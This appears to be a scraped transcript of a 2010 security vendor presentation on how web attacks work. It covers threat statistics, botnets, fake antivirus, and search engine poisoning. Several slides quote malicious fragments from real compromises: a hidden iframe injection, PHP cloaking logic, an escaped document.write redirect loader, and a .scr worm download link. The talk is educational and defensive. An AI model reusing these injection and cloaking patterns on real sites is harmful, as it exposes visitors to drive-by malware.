1 / 23

The Anatomy of a Web Attack

The Anatomy of a Web Attack. Dennis Pike Systems Engineer Geo Specialists Lead – Americas Security dennis.pike@bluecoat.com. Agenda. State of the Web Top categories Top attacks The Anatomy of a Web Attack Lures to web threats Examples Dynamic Link Analysis. Best of the Worst.

jalene
Download Presentation

The Anatomy of a Web Attack

An Image/Link below is provided (as is) to download presentation Download Policy: Content on the Website is provided to you AS IS for your information and personal use and may not be sold / licensed / shared on other websites without getting consent from its author. Content is provided to you AS IS for your information and personal use only. Download presentation by click this link. While downloading, if for some reason you are not able to download a presentation, the publisher may have deleted the file from their server. During download, if you can't get a presentation, the file might be deleted by the publisher.

E N D

Presentation Transcript

  1. The Anatomy of a Web Attack Dennis Pike Systems Engineer Geo Specialists Lead – Americas Security dennis.pike@bluecoat.com

  2. Agenda • State of the Web • Top categories • Top attacks • The Anatomy of a Web Attack • Lures to web threats • Examples • Dynamic Link Analysis

  3. Best of the Worst • Top Web Category? >> Among the top ten active categories of 2009, social networking access accounted for 25 percent of all Web access activity • Top Web threat? >> Fake Antivirus was the most successful Web threat in 2009, followed by the Fake Video Codec offer. >>New Fake AV installer programs increased from an average of 300 to 1,462 per day in the second half of 2009. * >>Average lifetime of sites that redirect users to Web pages that try to install scareware decreased with a median lifetime dropping below 100 hours around April 2009, below 10 hours around September 2009, and below one hour since January 2010. * *Google Inc.

  4. Email vs Social Networking • Do more people use email or social networking sites? >> According to Nielsen Co., in August 2009, 277 million people used email across the U.S., several European countries, Brazil and Australia, a 21 percent increase from the year before. But the number of users on social networking and other community sites jumped 31 percent to 302 million, bypassing the email user population by 10 percent.

  5. Noteworthy Items Argument for Video (HTTP and Streaming)

  6. Changing Web Habits • Top 10 Categories – 2009 • WebFilter/WebPulse, 62M+ Users • 1. Social Networking • 2. Web Advertisements • 3. Search Engines/Portals • 4. Personals/Dating • 5. Pornography • 6. Computers/Internet • 7. Audio/Video Clips • 8. Adult/Mature Content • 9. Web Email • 10. Illegal/Questionable Social Networking Moved to #1 from #2 position Represents 25% of Top10 requests Web Email Dropped to #9 from #5 position Users migrating to social networking Cyber Crime Leverages Search engine poisoning Fake AV and Codec updates Popular site injections Death, Drama & Disaster lures Health & Wealth scams

  7. Web Threats Rising Exponentially • 2/3 of all known malicious code threats in 1 year (Symantec April’09) • 1 in 150 Webpages infected in 2009 vs. 1 in 20,000 in 2006 (Kaspersky)

  8. Distribution Power • Botnet computing power to: Pitch worthless products Hijack online banking accounts Steal corporate data Top 5 Botnets in 2009 Koobface B Koobface D Botnet Zeus Monkif A Clickbot 1,070,000 Peak number of active bots 812,000 599,000 506,000 375,000 How it spreads Search Results Facebook Twitter Social Networking USA TODAY Research – March 2010

  9. 2 – Program messages user’s friends asking them to click on a link to a photo or video. 3 – Anyone who clicks on the link is asked to enable a media player needed to see the images. Running the file turns the PC into a bot. 4 – The bot steals the PC owners logon credentials, starting the cycle again. USA TODAY Research – March 2010 An Invitation to Crime 1 – An automated program logs on to social network using stolen user credentials.

  10. Web Evolution Static Pages Dynamic Pages Dynamic Pages Interactive Pages Publishing Model Community Model Single Host Pages Multi-Host Pages Nice to Have Must Have 10

  11. Multi-Host Pages SPORT 11

  12. Paths to Malware Infection Link Farms Infected Site Search Engine Blogs, Forums Relay Bait Malware 12

  13. End User…Infected Site www.inka.com <html> … <iframesrc="http://homenameregistration.cn/in.cgi?income12" width=1 height=1 style="visibility: hidden"></iframe><div id=“header”> … </html> homenameregistration.cn/in.cgi?income12

  14. Web 2.0 and Search Engines Forums Blogs Wikis Guestbooks WWW ? Search Engine View 14

  15. Web 2.0 and Search Engines WWW Links… Links… Links… Links… Links… Links… Words… Words… Words… Search Engine View Links… Links… Links… 15

  16. Hijacked Website if (“search engine”) { echo “…indexable content…” } else { echo “<body><script src="live.js"></script>” } xdesignstudios.com dir1 index.php … id=fall+printable+coloring+pages id=free+printable+easter+drawings id=disney+printable+cartoon+characters id=free+printable+halloween+sheets id=girls+free+printable+organizer id=in+store+printable+catherines+coupons … live.js

  17. End User…Search Engine Redirect index.php?id=hannah-montana-printable-birthday-invitations <body> <script src="live.js"> </script> live.js document.write(unescape('%3C%53%43%52%49%50%54%20%20%20%20%6C%61%6E%67%75… http://cracksinside.com/red/gen.js

  18. What just happened? WWW Links… Links… Links… Links… Links… Links… Words… Words… Words… Search Engine View Links… Links… Links… Redirect 20

  19. Recent Examples - VBMania www.sharedocuments.com/library/PDF_Document21.025542010.pdf Email text www.sharedocuments.com/library/PDF_Document21.025542010.pdf members.multimania.co.uk/yahoophoto/PDF_Document21_025542010_pdf.scr

  20. Recent Examples – Fake Warez

More Related